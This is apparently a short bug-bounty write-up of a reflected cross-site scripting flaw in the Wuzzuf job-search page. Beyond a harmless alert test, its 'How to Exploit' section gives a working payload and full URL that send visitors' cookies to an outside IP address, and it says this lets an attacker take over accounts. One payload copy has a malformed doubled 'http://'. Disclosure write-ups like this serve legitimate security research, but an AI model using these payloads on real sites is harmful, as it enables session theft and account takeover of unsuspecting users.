XSS on Wuzzuf

Vulnerability Write-up

Affected Endpoint: https://wuzzuf.net/search/jobs?q=‌

Used Payload: <img src=x onerror=alert(document.cookie)>‌

Full Request https://wuzzuf.net/search/jobs?q=<img src=x onerror=alert(document.cookie)>

How to Exploit

Malicious Payload: </title><img%20src=x%20onerror='location.href="http://http://156.218.18.188:8080/exploit?cook="%2bdocument.cookie;'>‌

Full Malicious Request: https://wuzzuf.net/search/jobs?q=</title><img%20src=x%20onerror='location.href="http://156.218.18.188:8080/exploit?cook="%2bdocument.cookie;'>‌

When Wuzzuf users visit this URL, the malicious attacker will have their cookies and can access their accounts.

PreviousXSS on Nokia NextBusiness Logic Flaw on Souq (Amazon Company)

Last updated 2 years ago